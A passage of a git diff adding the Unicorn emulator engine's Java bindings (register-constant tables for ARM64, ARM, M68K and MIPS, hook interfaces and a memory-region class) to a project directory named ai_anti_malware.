UC_ARM64_REG_B19 = 27; + public static final int UC_ARM64_REG_B20 = 28; + public static final int UC_ARM64_REG_B21 = 29; + public static final int UC_ARM64_REG_B22 = 30; + public static final int UC_ARM64_REG_B23 = 31; + public static final int UC_ARM64_REG_B24 = 32; + public static final int UC_ARM64_REG_B25 = 33; + public static final int UC_ARM64_REG_B26 = 34; + public static final int UC_ARM64_REG_B27 = 35; + public static final int UC_ARM64_REG_B28 = 36; + public static final int UC_ARM64_REG_B29 = 37; + public static final int UC_ARM64_REG_B30 
= 38; + public static final int UC_ARM64_REG_B31 = 39; + public static final int UC_ARM64_REG_D0 = 40; + public static final int UC_ARM64_REG_D1 = 41; + public static final int UC_ARM64_REG_D2 = 42; + public static final int UC_ARM64_REG_D3 = 43; + public static final int UC_ARM64_REG_D4 = 44; + public static final int UC_ARM64_REG_D5 = 45; + public static final int UC_ARM64_REG_D6 = 46; + public static final int UC_ARM64_REG_D7 = 47; + public static final int UC_ARM64_REG_D8 = 48; + public static final int UC_ARM64_REG_D9 = 49; + public static final int UC_ARM64_REG_D10 = 50; + public static final int UC_ARM64_REG_D11 = 51; + public static final int UC_ARM64_REG_D12 = 52; + public static final int UC_ARM64_REG_D13 = 53; + public static final int UC_ARM64_REG_D14 = 54; + public static final int UC_ARM64_REG_D15 = 55; + public static final int UC_ARM64_REG_D16 = 56; + public static final int UC_ARM64_REG_D17 = 57; + public static final int UC_ARM64_REG_D18 = 58; + public static final int UC_ARM64_REG_D19 = 59; + public static final int UC_ARM64_REG_D20 = 60; + public static final int UC_ARM64_REG_D21 = 61; + public static final int UC_ARM64_REG_D22 = 62; + public static final int UC_ARM64_REG_D23 = 63; + public static final int UC_ARM64_REG_D24 = 64; + public static final int UC_ARM64_REG_D25 = 65; + public static final int UC_ARM64_REG_D26 = 66; + public static final int UC_ARM64_REG_D27 = 67; + public static final int UC_ARM64_REG_D28 = 68; + public static final int UC_ARM64_REG_D29 = 69; + public static final int UC_ARM64_REG_D30 = 70; + public static final int UC_ARM64_REG_D31 = 71; + public static final int UC_ARM64_REG_H0 = 72; + public static final int UC_ARM64_REG_H1 = 73; + public static final int UC_ARM64_REG_H2 = 74; + public static final int UC_ARM64_REG_H3 = 75; + public static final int UC_ARM64_REG_H4 = 76; + public static final int UC_ARM64_REG_H5 = 77; + public static final int UC_ARM64_REG_H6 = 78; + public static final int UC_ARM64_REG_H7 = 79; + 
public static final int UC_ARM64_REG_H8 = 80; + public static final int UC_ARM64_REG_H9 = 81; + public static final int UC_ARM64_REG_H10 = 82; + public static final int UC_ARM64_REG_H11 = 83; + public static final int UC_ARM64_REG_H12 = 84; + public static final int UC_ARM64_REG_H13 = 85; + public static final int UC_ARM64_REG_H14 = 86; + public static final int UC_ARM64_REG_H15 = 87; + public static final int UC_ARM64_REG_H16 = 88; + public static final int UC_ARM64_REG_H17 = 89; + public static final int UC_ARM64_REG_H18 = 90; + public static final int UC_ARM64_REG_H19 = 91; + public static final int UC_ARM64_REG_H20 = 92; + public static final int UC_ARM64_REG_H21 = 93; + public static final int UC_ARM64_REG_H22 = 94; + public static final int UC_ARM64_REG_H23 = 95; + public static final int UC_ARM64_REG_H24 = 96; + public static final int UC_ARM64_REG_H25 = 97; + public static final int UC_ARM64_REG_H26 = 98; + public static final int UC_ARM64_REG_H27 = 99; + public static final int UC_ARM64_REG_H28 = 100; + public static final int UC_ARM64_REG_H29 = 101; + public static final int UC_ARM64_REG_H30 = 102; + public static final int UC_ARM64_REG_H31 = 103; + public static final int UC_ARM64_REG_Q0 = 104; + public static final int UC_ARM64_REG_Q1 = 105; + public static final int UC_ARM64_REG_Q2 = 106; + public static final int UC_ARM64_REG_Q3 = 107; + public static final int UC_ARM64_REG_Q4 = 108; + public static final int UC_ARM64_REG_Q5 = 109; + public static final int UC_ARM64_REG_Q6 = 110; + public static final int UC_ARM64_REG_Q7 = 111; + public static final int UC_ARM64_REG_Q8 = 112; + public static final int UC_ARM64_REG_Q9 = 113; + public static final int UC_ARM64_REG_Q10 = 114; + public static final int UC_ARM64_REG_Q11 = 115; + public static final int UC_ARM64_REG_Q12 = 116; + public static final int UC_ARM64_REG_Q13 = 117; + public static final int UC_ARM64_REG_Q14 = 118; + public static final int UC_ARM64_REG_Q15 = 119; + public static final int 
UC_ARM64_REG_Q16 = 120; + public static final int UC_ARM64_REG_Q17 = 121; + public static final int UC_ARM64_REG_Q18 = 122; + public static final int UC_ARM64_REG_Q19 = 123; + public static final int UC_ARM64_REG_Q20 = 124; + public static final int UC_ARM64_REG_Q21 = 125; + public static final int UC_ARM64_REG_Q22 = 126; + public static final int UC_ARM64_REG_Q23 = 127; + public static final int UC_ARM64_REG_Q24 = 128; + public static final int UC_ARM64_REG_Q25 = 129; + public static final int UC_ARM64_REG_Q26 = 130; + public static final int UC_ARM64_REG_Q27 = 131; + public static final int UC_ARM64_REG_Q28 = 132; + public static final int UC_ARM64_REG_Q29 = 133; + public static final int UC_ARM64_REG_Q30 = 134; + public static final int UC_ARM64_REG_Q31 = 135; + public static final int UC_ARM64_REG_S0 = 136; + public static final int UC_ARM64_REG_S1 = 137; + public static final int UC_ARM64_REG_S2 = 138; + public static final int UC_ARM64_REG_S3 = 139; + public static final int UC_ARM64_REG_S4 = 140; + public static final int UC_ARM64_REG_S5 = 141; + public static final int UC_ARM64_REG_S6 = 142; + public static final int UC_ARM64_REG_S7 = 143; + public static final int UC_ARM64_REG_S8 = 144; + public static final int UC_ARM64_REG_S9 = 145; + public static final int UC_ARM64_REG_S10 = 146; + public static final int UC_ARM64_REG_S11 = 147; + public static final int UC_ARM64_REG_S12 = 148; + public static final int UC_ARM64_REG_S13 = 149; + public static final int UC_ARM64_REG_S14 = 150; + public static final int UC_ARM64_REG_S15 = 151; + public static final int UC_ARM64_REG_S16 = 152; + public static final int UC_ARM64_REG_S17 = 153; + public static final int UC_ARM64_REG_S18 = 154; + public static final int UC_ARM64_REG_S19 = 155; + public static final int UC_ARM64_REG_S20 = 156; + public static final int UC_ARM64_REG_S21 = 157; + public static final int UC_ARM64_REG_S22 = 158; + public static final int UC_ARM64_REG_S23 = 159; + public static final int 
UC_ARM64_REG_S24 = 160; + public static final int UC_ARM64_REG_S25 = 161; + public static final int UC_ARM64_REG_S26 = 162; + public static final int UC_ARM64_REG_S27 = 163; + public static final int UC_ARM64_REG_S28 = 164; + public static final int UC_ARM64_REG_S29 = 165; + public static final int UC_ARM64_REG_S30 = 166; + public static final int UC_ARM64_REG_S31 = 167; + public static final int UC_ARM64_REG_W0 = 168; + public static final int UC_ARM64_REG_W1 = 169; + public static final int UC_ARM64_REG_W2 = 170; + public static final int UC_ARM64_REG_W3 = 171; + public static final int UC_ARM64_REG_W4 = 172; + public static final int UC_ARM64_REG_W5 = 173; + public static final int UC_ARM64_REG_W6 = 174; + public static final int UC_ARM64_REG_W7 = 175; + public static final int UC_ARM64_REG_W8 = 176; + public static final int UC_ARM64_REG_W9 = 177; + public static final int UC_ARM64_REG_W10 = 178; + public static final int UC_ARM64_REG_W11 = 179; + public static final int UC_ARM64_REG_W12 = 180; + public static final int UC_ARM64_REG_W13 = 181; + public static final int UC_ARM64_REG_W14 = 182; + public static final int UC_ARM64_REG_W15 = 183; + public static final int UC_ARM64_REG_W16 = 184; + public static final int UC_ARM64_REG_W17 = 185; + public static final int UC_ARM64_REG_W18 = 186; + public static final int UC_ARM64_REG_W19 = 187; + public static final int UC_ARM64_REG_W20 = 188; + public static final int UC_ARM64_REG_W21 = 189; + public static final int UC_ARM64_REG_W22 = 190; + public static final int UC_ARM64_REG_W23 = 191; + public static final int UC_ARM64_REG_W24 = 192; + public static final int UC_ARM64_REG_W25 = 193; + public static final int UC_ARM64_REG_W26 = 194; + public static final int UC_ARM64_REG_W27 = 195; + public static final int UC_ARM64_REG_W28 = 196; + public static final int UC_ARM64_REG_W29 = 197; + public static final int UC_ARM64_REG_W30 = 198; + public static final int UC_ARM64_REG_X0 = 199; + public static final int 
UC_ARM64_REG_X1 = 200; + public static final int UC_ARM64_REG_X2 = 201; + public static final int UC_ARM64_REG_X3 = 202; + public static final int UC_ARM64_REG_X4 = 203; + public static final int UC_ARM64_REG_X5 = 204; + public static final int UC_ARM64_REG_X6 = 205; + public static final int UC_ARM64_REG_X7 = 206; + public static final int UC_ARM64_REG_X8 = 207; + public static final int UC_ARM64_REG_X9 = 208; + public static final int UC_ARM64_REG_X10 = 209; + public static final int UC_ARM64_REG_X11 = 210; + public static final int UC_ARM64_REG_X12 = 211; + public static final int UC_ARM64_REG_X13 = 212; + public static final int UC_ARM64_REG_X14 = 213; + public static final int UC_ARM64_REG_X15 = 214; + public static final int UC_ARM64_REG_X16 = 215; + public static final int UC_ARM64_REG_X17 = 216; + public static final int UC_ARM64_REG_X18 = 217; + public static final int UC_ARM64_REG_X19 = 218; + public static final int UC_ARM64_REG_X20 = 219; + public static final int UC_ARM64_REG_X21 = 220; + public static final int UC_ARM64_REG_X22 = 221; + public static final int UC_ARM64_REG_X23 = 222; + public static final int UC_ARM64_REG_X24 = 223; + public static final int UC_ARM64_REG_X25 = 224; + public static final int UC_ARM64_REG_X26 = 225; + public static final int UC_ARM64_REG_X27 = 226; + public static final int UC_ARM64_REG_X28 = 227; + public static final int UC_ARM64_REG_V0 = 228; + public static final int UC_ARM64_REG_V1 = 229; + public static final int UC_ARM64_REG_V2 = 230; + public static final int UC_ARM64_REG_V3 = 231; + public static final int UC_ARM64_REG_V4 = 232; + public static final int UC_ARM64_REG_V5 = 233; + public static final int UC_ARM64_REG_V6 = 234; + public static final int UC_ARM64_REG_V7 = 235; + public static final int UC_ARM64_REG_V8 = 236; + public static final int UC_ARM64_REG_V9 = 237; + public static final int UC_ARM64_REG_V10 = 238; + public static final int UC_ARM64_REG_V11 = 239; + public static final int UC_ARM64_REG_V12 = 
240; + public static final int UC_ARM64_REG_V13 = 241; + public static final int UC_ARM64_REG_V14 = 242; + public static final int UC_ARM64_REG_V15 = 243; + public static final int UC_ARM64_REG_V16 = 244; + public static final int UC_ARM64_REG_V17 = 245; + public static final int UC_ARM64_REG_V18 = 246; + public static final int UC_ARM64_REG_V19 = 247; + public static final int UC_ARM64_REG_V20 = 248; + public static final int UC_ARM64_REG_V21 = 249; + public static final int UC_ARM64_REG_V22 = 250; + public static final int UC_ARM64_REG_V23 = 251; + public static final int UC_ARM64_REG_V24 = 252; + public static final int UC_ARM64_REG_V25 = 253; + public static final int UC_ARM64_REG_V26 = 254; + public static final int UC_ARM64_REG_V27 = 255; + public static final int UC_ARM64_REG_V28 = 256; + public static final int UC_ARM64_REG_V29 = 257; + public static final int UC_ARM64_REG_V30 = 258; + public static final int UC_ARM64_REG_V31 = 259; + +// pseudo registers + public static final int UC_ARM64_REG_PC = 260; + public static final int UC_ARM64_REG_CPACR_EL1 = 261; + +// thread registers + public static final int UC_ARM64_REG_TPIDR_EL0 = 262; + public static final int UC_ARM64_REG_TPIDRRO_EL0 = 263; + public static final int UC_ARM64_REG_TPIDR_EL1 = 264; + public static final int UC_ARM64_REG_PSTATE = 265; + +// exception link registers + public static final int UC_ARM64_REG_ELR_EL0 = 266; + public static final int UC_ARM64_REG_ELR_EL1 = 267; + public static final int UC_ARM64_REG_ELR_EL2 = 268; + public static final int UC_ARM64_REG_ELR_EL3 = 269; + +// stack pointers registers + public static final int UC_ARM64_REG_SP_EL0 = 270; + public static final int UC_ARM64_REG_SP_EL1 = 271; + public static final int UC_ARM64_REG_SP_EL2 = 272; + public static final int UC_ARM64_REG_SP_EL3 = 273; + +// other CP15 registers + public static final int UC_ARM64_REG_TTBR0_EL1 = 274; + public static final int UC_ARM64_REG_TTBR1_EL1 = 275; + public static final int 
UC_ARM64_REG_ESR_EL0 = 276; + public static final int UC_ARM64_REG_ESR_EL1 = 277; + public static final int UC_ARM64_REG_ESR_EL2 = 278; + public static final int UC_ARM64_REG_ESR_EL3 = 279; + public static final int UC_ARM64_REG_FAR_EL0 = 280; + public static final int UC_ARM64_REG_FAR_EL1 = 281; + public static final int UC_ARM64_REG_FAR_EL2 = 282; + public static final int UC_ARM64_REG_FAR_EL3 = 283; + public static final int UC_ARM64_REG_PAR_EL1 = 284; + public static final int UC_ARM64_REG_MAIR_EL1 = 285; + public static final int UC_ARM64_REG_VBAR_EL0 = 286; + public static final int UC_ARM64_REG_VBAR_EL1 = 287; + public static final int UC_ARM64_REG_VBAR_EL2 = 288; + public static final int UC_ARM64_REG_VBAR_EL3 = 289; + public static final int UC_ARM64_REG_ENDING = 290; + +// alias registers + public static final int UC_ARM64_REG_IP0 = 215; + public static final int UC_ARM64_REG_IP1 = 216; + public static final int UC_ARM64_REG_FP = 1; + public static final int UC_ARM64_REG_LR = 2; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ArmConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ArmConst.java new file mode 100644 index 0000000..0bab07a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ArmConst.java @@ -0,0 +1,138 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface ArmConst { + +// ARM registers + + public static final int UC_ARM_REG_INVALID = 0; + public static final int UC_ARM_REG_APSR = 1; + public static final int UC_ARM_REG_APSR_NZCV = 2; + public static final int UC_ARM_REG_CPSR = 3; + public static final int UC_ARM_REG_FPEXC = 4; + public static final int UC_ARM_REG_FPINST = 5; + public static final int UC_ARM_REG_FPSCR = 6; + public static final int UC_ARM_REG_FPSCR_NZCV = 7; + public static final int UC_ARM_REG_FPSID = 8; + public static final int UC_ARM_REG_ITSTATE = 9; + public static final int UC_ARM_REG_LR = 10; + public static final int UC_ARM_REG_PC = 11; + public static final int UC_ARM_REG_SP = 12; + public static final int UC_ARM_REG_SPSR = 13; + public static final int UC_ARM_REG_D0 = 14; + public static final int UC_ARM_REG_D1 = 15; + public static final int UC_ARM_REG_D2 = 16; + public static final int UC_ARM_REG_D3 = 17; + public static final int UC_ARM_REG_D4 = 18; + public static final int UC_ARM_REG_D5 = 19; + public static final int UC_ARM_REG_D6 = 20; + public static final int UC_ARM_REG_D7 = 21; + public static final int UC_ARM_REG_D8 = 22; + public static final int UC_ARM_REG_D9 = 23; + public static final int UC_ARM_REG_D10 = 24; + public static final int UC_ARM_REG_D11 = 25; + public static final int UC_ARM_REG_D12 = 26; + public static final int UC_ARM_REG_D13 = 27; + public static final int UC_ARM_REG_D14 = 28; + public static final int UC_ARM_REG_D15 = 29; + public static final int UC_ARM_REG_D16 = 30; + public static final int UC_ARM_REG_D17 = 31; + public static final int UC_ARM_REG_D18 = 32; + public static final int UC_ARM_REG_D19 = 33; + public static final int UC_ARM_REG_D20 = 34; + public static final int UC_ARM_REG_D21 = 35; + public static final int UC_ARM_REG_D22 = 36; + public static final int UC_ARM_REG_D23 = 37; + public static final int UC_ARM_REG_D24 = 38; + public static final int UC_ARM_REG_D25 = 39; + 
public static final int UC_ARM_REG_D26 = 40; + public static final int UC_ARM_REG_D27 = 41; + public static final int UC_ARM_REG_D28 = 42; + public static final int UC_ARM_REG_D29 = 43; + public static final int UC_ARM_REG_D30 = 44; + public static final int UC_ARM_REG_D31 = 45; + public static final int UC_ARM_REG_FPINST2 = 46; + public static final int UC_ARM_REG_MVFR0 = 47; + public static final int UC_ARM_REG_MVFR1 = 48; + public static final int UC_ARM_REG_MVFR2 = 49; + public static final int UC_ARM_REG_Q0 = 50; + public static final int UC_ARM_REG_Q1 = 51; + public static final int UC_ARM_REG_Q2 = 52; + public static final int UC_ARM_REG_Q3 = 53; + public static final int UC_ARM_REG_Q4 = 54; + public static final int UC_ARM_REG_Q5 = 55; + public static final int UC_ARM_REG_Q6 = 56; + public static final int UC_ARM_REG_Q7 = 57; + public static final int UC_ARM_REG_Q8 = 58; + public static final int UC_ARM_REG_Q9 = 59; + public static final int UC_ARM_REG_Q10 = 60; + public static final int UC_ARM_REG_Q11 = 61; + public static final int UC_ARM_REG_Q12 = 62; + public static final int UC_ARM_REG_Q13 = 63; + public static final int UC_ARM_REG_Q14 = 64; + public static final int UC_ARM_REG_Q15 = 65; + public static final int UC_ARM_REG_R0 = 66; + public static final int UC_ARM_REG_R1 = 67; + public static final int UC_ARM_REG_R2 = 68; + public static final int UC_ARM_REG_R3 = 69; + public static final int UC_ARM_REG_R4 = 70; + public static final int UC_ARM_REG_R5 = 71; + public static final int UC_ARM_REG_R6 = 72; + public static final int UC_ARM_REG_R7 = 73; + public static final int UC_ARM_REG_R8 = 74; + public static final int UC_ARM_REG_R9 = 75; + public static final int UC_ARM_REG_R10 = 76; + public static final int UC_ARM_REG_R11 = 77; + public static final int UC_ARM_REG_R12 = 78; + public static final int UC_ARM_REG_S0 = 79; + public static final int UC_ARM_REG_S1 = 80; + public static final int UC_ARM_REG_S2 = 81; + public static final int UC_ARM_REG_S3 
= 82; + public static final int UC_ARM_REG_S4 = 83; + public static final int UC_ARM_REG_S5 = 84; + public static final int UC_ARM_REG_S6 = 85; + public static final int UC_ARM_REG_S7 = 86; + public static final int UC_ARM_REG_S8 = 87; + public static final int UC_ARM_REG_S9 = 88; + public static final int UC_ARM_REG_S10 = 89; + public static final int UC_ARM_REG_S11 = 90; + public static final int UC_ARM_REG_S12 = 91; + public static final int UC_ARM_REG_S13 = 92; + public static final int UC_ARM_REG_S14 = 93; + public static final int UC_ARM_REG_S15 = 94; + public static final int UC_ARM_REG_S16 = 95; + public static final int UC_ARM_REG_S17 = 96; + public static final int UC_ARM_REG_S18 = 97; + public static final int UC_ARM_REG_S19 = 98; + public static final int UC_ARM_REG_S20 = 99; + public static final int UC_ARM_REG_S21 = 100; + public static final int UC_ARM_REG_S22 = 101; + public static final int UC_ARM_REG_S23 = 102; + public static final int UC_ARM_REG_S24 = 103; + public static final int UC_ARM_REG_S25 = 104; + public static final int UC_ARM_REG_S26 = 105; + public static final int UC_ARM_REG_S27 = 106; + public static final int UC_ARM_REG_S28 = 107; + public static final int UC_ARM_REG_S29 = 108; + public static final int UC_ARM_REG_S30 = 109; + public static final int UC_ARM_REG_S31 = 110; + public static final int UC_ARM_REG_C1_C0_2 = 111; + public static final int UC_ARM_REG_C13_C0_2 = 112; + public static final int UC_ARM_REG_C13_C0_3 = 113; + public static final int UC_ARM_REG_IPSR = 114; + public static final int UC_ARM_REG_MSP = 115; + public static final int UC_ARM_REG_PSP = 116; + public static final int UC_ARM_REG_CONTROL = 117; + public static final int UC_ARM_REG_ENDING = 118; + +// alias registers + public static final int UC_ARM_REG_R13 = 12; + public static final int UC_ARM_REG_R14 = 10; + public static final int UC_ARM_REG_R15 = 11; + public static final int UC_ARM_REG_SB = 75; + public static final int UC_ARM_REG_SL = 76; + public 
static final int UC_ARM_REG_FP = 77; + public static final int UC_ARM_REG_IP = 78; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/BlockHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/BlockHook.java new file mode 100644 index 0000000..cae5ef9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/BlockHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface BlockHook extends Hook { + + public void hook(Unicorn u, long address, int size, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/CodeHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/CodeHook.java new file mode 100644 index 0000000..6cbfdd4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/CodeHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. 
+ +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface CodeHook extends Hook { + + public void hook(Unicorn u, long address, int size, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/EventMemHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/EventMemHook.java new file mode 100644 index 0000000..db1f12d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/EventMemHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +package unicorn; + +public interface EventMemHook extends Hook { + + public boolean hook(Unicorn u, long address, int size, long value, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Hook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Hook.java new file mode 100644 index 0000000..003599a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Hook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +/** + * Base class for all unicorn hooking interfaces + */ + +public interface Hook { +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InHook.java new file mode 100644 index 0000000..97653ab --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. 
+ +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface InHook extends Hook { + + public int hook(Unicorn u, int port, int size, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InterruptHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InterruptHook.java new file mode 100644 index 0000000..23bc29f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InterruptHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +package unicorn; + +public interface InterruptHook extends Hook { + + public void hook(Unicorn u, int intno, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/M68kConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/M68kConst.java new file mode 100644 index 0000000..4f0574d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/M68kConst.java @@ -0,0 +1,30 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface M68kConst { + +// M68K registers + + public static final int UC_M68K_REG_INVALID = 0; + public static final int UC_M68K_REG_A0 = 1; + public static final int UC_M68K_REG_A1 = 2; + public static final int UC_M68K_REG_A2 = 3; + public static final int UC_M68K_REG_A3 = 4; + public static final int UC_M68K_REG_A4 = 5; + public static final int UC_M68K_REG_A5 = 6; + public static final int UC_M68K_REG_A6 = 7; + public static final int UC_M68K_REG_A7 = 8; + public static final int UC_M68K_REG_D0 = 9; + public static final int UC_M68K_REG_D1 = 10; + public static final int UC_M68K_REG_D2 = 11; + public static final int UC_M68K_REG_D3 = 12; + public static final int UC_M68K_REG_D4 = 13; + public static final int UC_M68K_REG_D5 = 14; + public static final int UC_M68K_REG_D6 = 15; + public static final int UC_M68K_REG_D7 = 16; + public static final int UC_M68K_REG_SR = 17; + public static final int UC_M68K_REG_PC = 18; + public static final int UC_M68K_REG_ENDING = 19; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemHook.java new file mode 100644 index 0000000..9f1a188 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemHook.java @@ -0,0 +1,27 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute 
it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface MemHook extends ReadHook,WriteHook { + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemRegion.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemRegion.java new file mode 100644 index 0000000..b729b3a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemRegion.java @@ -0,0 +1,37 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +package unicorn; + +public class MemRegion { + + public long begin; + public long end; + public int perms; + + public MemRegion(long begin, long end, int perms) { + this.begin = begin; + this.end = end; + this.perms = perms; + } + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MipsConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MipsConst.java new file mode 100644 index 0000000..3b2dd99 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MipsConst.java @@ -0,0 +1,203 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface MipsConst { + +// MIPS registers + + public static final int UC_MIPS_REG_INVALID = 0; + +// General purpose registers + public static final int UC_MIPS_REG_PC = 1; + public static final int UC_MIPS_REG_0 = 2; + public static final int UC_MIPS_REG_1 = 3; + public static final int UC_MIPS_REG_2 = 4; + public static final int UC_MIPS_REG_3 = 5; + public static final int UC_MIPS_REG_4 = 6; + public static final int UC_MIPS_REG_5 = 7; + public static final int UC_MIPS_REG_6 = 8; + public static final int UC_MIPS_REG_7 = 9; + public static final int UC_MIPS_REG_8 = 10; + public static final int UC_MIPS_REG_9 = 11; + public static final int UC_MIPS_REG_10 = 12; + public static final int UC_MIPS_REG_11 = 13; + public static final int UC_MIPS_REG_12 = 14; + public static final int UC_MIPS_REG_13 = 15; + public static final int UC_MIPS_REG_14 = 16; + public static final int UC_MIPS_REG_15 = 17; + public static final int UC_MIPS_REG_16 = 18; + public static final int UC_MIPS_REG_17 = 19; + public static final int UC_MIPS_REG_18 = 20; + public static final int UC_MIPS_REG_19 = 21; + public static final int UC_MIPS_REG_20 = 22; + public static final int UC_MIPS_REG_21 = 23; + public static final int UC_MIPS_REG_22 = 24; + public static final 